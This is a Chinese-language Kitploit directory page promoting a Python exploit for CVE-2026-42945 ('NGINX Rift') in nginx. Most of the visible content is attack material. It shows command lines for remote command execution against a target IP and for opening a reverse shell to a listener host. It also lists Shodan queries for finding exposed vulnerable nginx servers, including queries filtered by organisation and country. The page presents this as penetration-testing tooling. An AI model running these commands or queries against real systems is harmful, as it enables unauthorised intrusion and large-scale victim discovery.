Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-42945-NGINX-Rift — 针对CVE-2026-42945 (NGINX Rift)的Python利用程序,具备反弹Shell功能以及基于Shodan的目标发现能力,用于渗透测试。 | Kitploit
工具/GitHubGitHub/renison-gohel/cve-2026-42945-nginx-rift
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubrenison-gohel/cve-2026-42945-nginx-rift

CVE-2026-42945-NGINX-Rift

针对CVE-2026-42945 (NGINX Rift)的Python利用程序,具备反弹Shell功能以及基于Shodan的目标发现能力,用于渗透测试。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
123个月前尚未审核

CVE-2026-42945-NGINX-Rift

root@kitploit:~
# Basic usage with target IP
python3 exploit.py --target-ip 192.168.1.100 --cmd "id"

# With custom port
python3 exploit.py --target-ip 192.168.1.100 --port 8080 --cmd "id"

# Reverse shell
python3 exploit.py --target-ip 192.168.1.100 --shell --listen-ip 10.0.0.1 --listen-port 4444

# Using the old --host parameter (still works)
python3 exploit.py --host 192.168.1.100 --cmd "id"

Shodan 搜索查询

主要 Shodan 搜索查询:

root@kitploit:~
# Most specific - looking for nginx with the rift vulnerability pattern
http.title:"nginx" port:"19321"

# More general nginx search on non-standard ports
nginx port:"19321"

# Search for nginx with potential rift vulnerability indicators
"nginx/1." "19321"

# Search for nginx on high ports (common for test/dev environments)
nginx port:"8000-9000" http.title:"nginx"

# Search for nginx with specific headers that might indicate vulnerable config
"Server: nginx" "X-Delay"

更针对性的查询:

root@kitploit:~
# Looking for nginx on the specific port used in the exploit
port:19321 nginx

# Find nginx servers that might be running in development environments
nginx "Welcome to nginx" port:8080,8000,8888,19321

# Search for nginx with unusual port ranges (where rift might be deployed)
nginx port:10000-20000

# Combining with HTTP methods that might indicate the rift endpoint
"POST /spray" http.title:nginx

高级 Shodan 过滤器:

root@kitploit:~
# Very specific - looking for the exact port and nginx
port:19321 org:"Your Target Organization"

# Find nginx on all non-standard ports (excluding 80,443,8080)
nginx -port:80,443,8080

# Search by country and nginx on specific port
port:19321 country:US nginx

# Find nginx with potential debug/admin interfaces
http.title:"nginx" http.status:200 port:8000-9000
下载工具